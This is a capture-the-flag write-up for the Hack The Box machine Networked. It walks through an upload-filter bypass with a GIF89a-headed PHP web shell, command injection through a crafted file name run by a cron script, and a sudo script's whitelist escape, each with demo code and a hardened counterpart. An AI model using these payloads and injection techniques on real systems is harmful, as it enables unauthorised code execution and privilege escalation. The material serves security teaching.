Networked was a good introduction to the world of HTB. Generally discussed as the easiest of the active boxes at the time of its retirement, there is nothing particularly complex about getting to root. The initial foothold involved bypassing upload restrictions to get a reverse shell. The user pivot required abusing an existing cron job running as the user guly. Finally, root required leveraging a sudo script and escaping its input constraints to execute arbitrary code as root.
Kicking it off with an NMAP scan.
Let's pop open the browser and take a look at what we can find.
Hmm, not much to see there, so let's see if a directory buster can discover anything further for us.
Awesome, looks like we potentially have the ability to upload files. Let's try uploading a PHP reverse shell from pentestmonkey.
After attempting a few variants, including tacking .jpg onto the .php filename, the upload was still being blocked. Taking a step back, I explored the remaining identified locations, and the backup directory provided an interesting item.
Well now, isn't that interesting! A backup of the files used by the site, including upload.php. Perfect, now we can take a look at the restrictions imposed on uploads.
Now that we understand what the restrictions are, we can follow along with this page and insert `GIF89a;` at the top of the PHP reverse shell so that a content check sees a GIF signature. The upload was successful, and browsing to the photos.php page with a reverse listener active gives us our initial foothold.
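To make the bypass concrete, here is an added Python model of the kind of upload filter a `GIF89a` header defeats. It is example code written for this post, not upload.php from the box: the weak filter (allowed suffix plus content sniffing by magic bytes) is an assumption about the shape of the check, the sniffer is a hand-rolled stand-in for `mime_content_type()`, and the PHP payload is a constructed stand-in for the pentestmonkey shell. A hardened check is shown alongside it.

```python
# Added example: models an image-upload filter and the GIF89a polyglot bypass.
# The filter logic is an assumption about the shape of the check, not the site's code.

# Constructed stand-in for the pentestmonkey reverse shell: any PHP will do here.
PHP_PAYLOAD = b"<?php system($_GET['cmd']); ?>\n"

ALLOWED_EXT = (".jpg", ".jpeg", ".png", ".gif")

# Magic bytes that libmagic-style sniffers map to image types (first bytes only).
MAGIC = (
    (b"GIF87a", "image/gif"),
    (b"GIF89a", "image/gif"),
    (b"\x89PNG\r\n\x1a\n", "image/png"),
    (b"\xff\xd8\xff", "image/jpeg"),
)

EXT_TO_MIME = {".jpg": "image/jpeg", ".jpeg": "image/jpeg",
               ".png": "image/png", ".gif": "image/gif"}


def sniff_mime(data: bytes) -> str:
    """Content sniffing in the style of mime_content_type(): looks at leading bytes only."""
    for magic, mime in MAGIC:
        if data.startswith(magic):
            return mime
    return "application/octet-stream"


def weak_check(filename: str, data: bytes) -> bool:
    """Assumed weak filter: the name must END with an image extension and the
    sniffed type must be image/*. A name like shell.php.gif with a GIF header
    satisfies both, which is exactly why the header trick works."""
    return filename.lower().endswith(ALLOWED_EXT) and sniff_mime(data).startswith("image/")


def make_polyglot(payload: bytes, header: bytes = b"GIF89a;") -> bytes:
    """Prepend a GIF signature so sniffers report image/gif. The PHP engine
    emits the leading bytes as plain output and still executes the <?php block."""
    return header + b"\n" + payload


def hardened_check(filename: str, data: bytes) -> bool:
    """Stricter filter: exactly one extension, magic bytes consistent with it,
    and no PHP open tag anywhere in the body (not just the first bytes)."""
    parts = filename.lower().split(".")
    if len(parts) != 2 or not parts[0]:
        return False                      # rejects shell.php.gif (two extensions)
    expected = EXT_TO_MIME.get("." + parts[1])
    if expected is None or sniff_mime(data) != expected:
        return False                      # extension and content must agree
    if b"<?" in data:
        return False                      # rejects the polyglot body
    return True


if __name__ == "__main__":
    polyglot = make_polyglot(PHP_PAYLOAD)
    print("shell.php        weak:", weak_check("shell.php", PHP_PAYLOAD))
    print("shell.php.jpg    weak:", weak_check("shell.php.jpg", PHP_PAYLOAD))
    print("shell.php.gif    weak:", weak_check("shell.php.gif", polyglot))
    print("shell.php.gif    hard:", hardened_check("shell.php.gif", polyglot))
```

Whether a `.php.gif` name actually executes depends on the web server's handler configuration; on Apache/mod_php setups that register PHP with an `AddHandler`-style directive, any `.php` segment in a multi-extension name is enough. Even the hardened check above is only a filter: the real fix is to re-encode uploaded images and serve uploads from a location where nothing executes.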
Unfortunately this shell did not grant us access to the user flag, so we need to find a pivot to the real user. After some initial enumeration I stumbled onto the following cron job.
Now let's check what the check_attack.php script actually does...
The interesting part is the exec line, where we control the contents of $value. By carefully crafting a test file we should be able to execute arbitrary code as the user guly. Let's give it a shot.
Now, with another nc listener set up, we wait for the cron job to kick off.
With that, user is done. On to root!
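Here is an added example, written for this post rather than taken from the box's check_attack.php, that reproduces the user pivot in miniature: a scratch "uploads" directory, one crafted file name, and a cleanup loop that interpolates each entry name into a shell command. The `rm -f <path><value>` shape of the exec line and the crafted name `; touch injected_marker` are assumptions for the demo; the hardened variant passes the name as a single argv element instead.

```python
# Added example: command injection through a file name that a cron script
# interpolates into exec(). The exec shape is an assumption, not the box's code.
import os
import subprocess
import tempfile

MARKER = "injected_marker"
# Constructed attacker-controlled file name: ';' and spaces are legal in Linux
# file names, so a shell as the web user can plant it in the scanned directory.
EVIL_NAME = "; touch " + MARKER


def build_command(path: str, value: str) -> str:
    """Assumed shape of the cron script's exec() line: the directory entry name
    is interpolated straight into a shell command string."""
    return "rm -f " + path + value


def cleanup(path: str, value: str, safe: bool) -> None:
    if safe:
        # Hardened: argv list, no shell, so the name is one argument whatever it
        # contains (PHP equivalent: escapeshellarg($path . $value) before exec()).
        subprocess.run(["rm", "-f", path + value], check=False)
    else:
        # Vulnerable: /bin/sh parses the string, so ';' ends rm and starts our command.
        subprocess.run(build_command(path, value), shell=True, cwd=path,
                       stderr=subprocess.DEVNULL, check=False)


def simulate(safe: bool) -> dict:
    """Mimic one cron run over a scratch copy of the uploads directory and report
    whether the injected command ran and whether the crafted file got removed."""
    with tempfile.TemporaryDirectory() as d:
        path = d + "/"
        open(path + EVIL_NAME, "w").close()          # plant the crafted file
        for value in sorted(os.listdir(d)):          # scandir()-style loop
            if value.startswith("."):
                continue
            cleanup(path, value, safe)
        return {
            "marker_created": os.path.exists(path + MARKER),     # injected code ran?
            "evil_removed": not os.path.exists(path + EVIL_NAME),
        }


if __name__ == "__main__":
    print("vulnerable:", simulate(safe=False))   # marker created, file survives
    print("hardened:  ", simulate(safe=True))    # no marker, file removed
```

On the box the payload in the file name would be a reverse shell back to the listener rather than a `touch`, and it runs with whatever privileges the cron job has, which is the whole point of the pivot.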
Root was rather simple by comparison. With our guly shell we kick off another round of enumeration and quickly find that there is a sudo rule in place that lets guly run a script as root.
Taking a look at the changename.sh script:
Now let's give it a test run and see what happens.
Ok, nothing too telling here. So let's go back to the code. There seems to be a general regex whitelist meant to keep out the special characters that would allow command encapsulation. After a few different tests I realized that backslash-escaped characters in that pattern were still being interpreted, so let's see if we can chain together some execution as root using that technique.
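To show the general failure mode, here is an added POSIX shell example written for this post; it is not changename.sh, which the page does not reproduce. The whitelist regex (with an escaped space, `\ `, inside the character class) and the consumer that writes `KEY=value` lines into a file that a privileged step later sources as shell are both assumptions for the demo. The point it demonstrates is that a value which passes a "no special characters" filter can still carry a second word, and when `NAME=eth0 id -u` is sourced, the shell treats `NAME=eth0` as a temporary environment assignment and runs `id -u` as a command.

```sh
#!/bin/sh
# Added example, not the box's script. Assumed whitelist: a "no special
# characters" class that includes an escaped space ("\ "), so a plain space
# is an accepted character even though ';', '$', '(' and '`' are not.
regexp='^[a-zA-Z0-9_\ /-]+$'

validate() {
  # Returns 0 when the value passes the whitelist, 1 otherwise.
  printf '%s\n' "$1" | grep -Eq "$regexp"
}

# Assumed consumer: the validated value is appended as KEY=value to a config
# file that another, privileged, step sources as shell code.
write_config() {
  printf 'NAME=%s\n' "$1" > "$2"
}

sourced_output() {
  # Source the generated file in a subshell and return whatever it printed.
  # For "eth0" nothing is printed; for "eth0 id -u" the sourced line is the
  # command "id -u" run with NAME=eth0 in its environment.
  cfg=$(mktemp)
  write_config "$1" "$cfg"
  ( . "$cfg" ) 2>/dev/null
  rm -f "$cfg"
}

# Stand-alone demo: which candidate values pass, and what sourcing them does.
for v in 'eth0' 'eth0;id' 'eth0$(id)' 'eth0 id -u'; do
  if validate "$v"; then
    echo "accepted: [$v] -> sourced output: [$(sourced_output "$v")]"
  else
    echo "rejected: [$v]"
  fi
done
```

Replace `id -u` with the command of your choice and the same shape gives code execution as whoever sources the file. The defence is not a better regex: values written into a file that will be sourced need to be quoted for the shell (or, better, the file should never be executed as shell at all).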
And with that, Networked is in the books! Thanks folks, until next time.
Follow me and let me know what you think of this article on Twitter!